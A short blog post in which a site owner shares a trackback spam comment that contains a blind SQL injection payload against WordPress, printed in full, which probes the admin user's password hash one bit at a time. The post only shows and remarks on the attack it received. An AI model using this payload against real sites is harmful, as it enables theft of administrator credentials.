So this is a cute comment I got, a trackback spam that’s also a SQL injection exploit for Wordpress. Check it out:
Website: ‘ AND 1=0) UNION SELECT 1 FROM wp_users WHERE user_login=’admin’ and substring(reverse(lpad(conv(substring(user_pass,8,1), 16, 2),4,’0′)),4,1)=’1′ /* (IP: 188.8.131.52 , svservers.com)
It appears to be a known-cryptotext or weak-hash exploit against Wordpress looking for an admin password with an obvious signature. Cute.
Posted in Spam